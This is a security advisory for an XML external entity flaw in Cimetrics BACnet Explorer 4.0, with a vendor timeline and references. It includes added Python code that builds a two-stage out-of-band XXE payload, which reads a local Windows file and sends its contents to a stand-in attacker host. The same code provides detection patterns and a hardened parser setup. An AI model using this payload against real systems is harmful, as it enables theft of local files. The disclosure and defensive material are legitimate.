Cimetrics BACnet Explorer 4.0 XXE Vulnerability

Title: Cimetrics BACnet Explorer 4.0 XXE Vulnerability
Advisory ID: ZSL-2017-5398
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information, DoS
Risk: (3/5)
Release Date: 12.02.2017
Summary
BACnet Explorer is a BACnet client application that automatically discovers BACnet devices on a network.
Description
BACnet Explorer suffers from an XML External Entity (XXE) vulnerability that uses the DTD parameter entity technique, resulting in disclosure and retrieval of arbitrary data from the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when the application parses a crafted XML project file: the XML parser resolves the DTD and the external entities declared in the file instead of rejecting them, so a parameter entity that points at an attacker-controlled DTD is fetched, and that DTD can in turn read a local file and deliver its contents to a remote host in a follow-up request.
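The following is an added example written for this advisory; it is not the ZSL PoC file (bacnetexplorer_xxe.txt) and not Cimetrics code. It shows the two-stage parameter entity payload the description refers to, a pre-open check that flags such a project file before it reaches a DTD-resolving parser, and a parser configuration (Python's stdlib expat, used here only as a stand-in for whatever parser the application uses) that refuses the constructs the attack needs. The attacker host, collector URL and target file path are assumptions chosen for illustration.

```python
"""Added example for ZSL-2017-5398: builds, detects and refuses an OOB XXE
payload. Not the advisory's PoC; host and file path below are assumed."""
import re
import xml.parsers.expat as expat

ATTACKER = "http://attacker.example"        # assumed attacker/collector host
TARGET_FILE = "file:///C:/Windows/win.ini"  # assumed file to read on the victim


def build_project_file(dtd_url=ATTACKER + "/evil.dtd"):
    """Stage 1: the crafted project file the victim opens. Its internal subset
    declares one parameter entity pointing at an attacker-controlled DTD and
    references it, so a parser that resolves DTDs fetches stage 2."""
    lines = [
        '<?xml version="1.0"?>',
        "<!DOCTYPE project [",
        f'  <!ENTITY % remote SYSTEM "{dtd_url}">',
        "  %remote;",
        "]>",
        '<project name="constructed sample"/>',
    ]
    return "\n".join(lines) + "\n"


def build_external_dtd(target=TARGET_FILE, collector=ATTACKER):
    """Stage 2: the DTD served from the attacker host. %file reads the target,
    %eval declares a further parameter entity whose system identifier embeds
    the file contents in a URL, and %exfil makes the parser request that URL.
    That request is the out-of-band channel. &#x25; is an escaped '%' so the
    nested declaration survives the first expansion."""
    exfil_decl = f"<!ENTITY &#x25; exfil SYSTEM '{collector}/?d=%file;'>"
    lines = [
        f'<!ENTITY % file SYSTEM "{target}">',
        f'<!ENTITY % eval "{exfil_decl}">',
        "%eval;",
        "%exfil;",
    ]
    return "\n".join(lines) + "\n"


# Constructs a benign project file has no reason to contain: a DOCTYPE with an
# external subset, a parameter entity declaration, or any entity with a
# SYSTEM/PUBLIC identifier. Checked on the raw text, before any parsing.
_DOCTYPE_EXTERNAL = re.compile(r"<!DOCTYPE\b[^\[>]*\b(SYSTEM|PUBLIC)\b", re.I)
_PARAM_ENTITY = re.compile(r"<!ENTITY\s+%", re.I)
_EXTERNAL_ENTITY = re.compile(r"<!ENTITY\b[^>]*\b(SYSTEM|PUBLIC)\b", re.I)


def xxe_indicators(xml_text):
    """Return the names of XXE constructs found in raw XML (empty if none)."""
    found = []
    if _DOCTYPE_EXTERNAL.search(xml_text):
        found.append("external-dtd")
    if _PARAM_ENTITY.search(xml_text):
        found.append("parameter-entity")
    if _EXTERNAL_ENTITY.search(xml_text):
        found.append("external-entity")
    return found


def parse_without_dtd(xml_text, allow_internal_subset=False):
    """Parse with stdlib expat while refusing what the attack relies on: any
    DOCTYPE aborts the parse (an internal-only subset may be allowed), and any
    external entity reference that still reaches the parser is refused by
    returning 0 from the handler, which expat turns into an ExpatError.
    Returns the root element name and its attributes."""
    parser = expat.ParserCreate()
    result = {}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_internal_subset or sysid or pubid:
            raise ValueError("DTD in project file refused: " + name)

    def on_external_ref(context, base, system_id, public_id):
        return 0  # never fetch file:// or http:// entities

    def on_start(name, attrs):
        if not result:
            result["root"] = name
            result["attrs"] = attrs

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.Parse(xml_text, True)
    return result
```

Running xxe_indicators over a project file before opening it is a cheap gate for operators; the durable fix belongs in the application, which should load project files with DTD processing disabled (the equivalent of the DOCTYPE refusal above in whatever XML library it uses, for example DtdProcessing.Prohibit on a .NET XmlReaderSettings).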
Vendor
Cimetrics, Inc. - https://www.cimetrics.com
Affected Version
4.0.0.0
Tested On
Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vendor Status
[30.01.2017] Vulnerability discovered.
[31.01.2017] Vendor contacted.
[11.02.2017] No reply from the vendor.
[12.02.2017] Public security advisory released.
PoC
bacnetexplorer_xxe.txt
Credits
Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
References
[1] https://www.exploit-db.com/exploits/41321/
[2] https://cxsecurity.com/issue/WLB-2017020121
[3] https://packetstormsecurity.com/files/141054
[4] https://exchange.xforce.ibmcloud.com/vulnerabilities/122001
Changelog
[12.02.2017] - Initial release
[18.02.2017] - Added references [1], [2], [3] and [4]
Contact
Zero Science Lab

Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk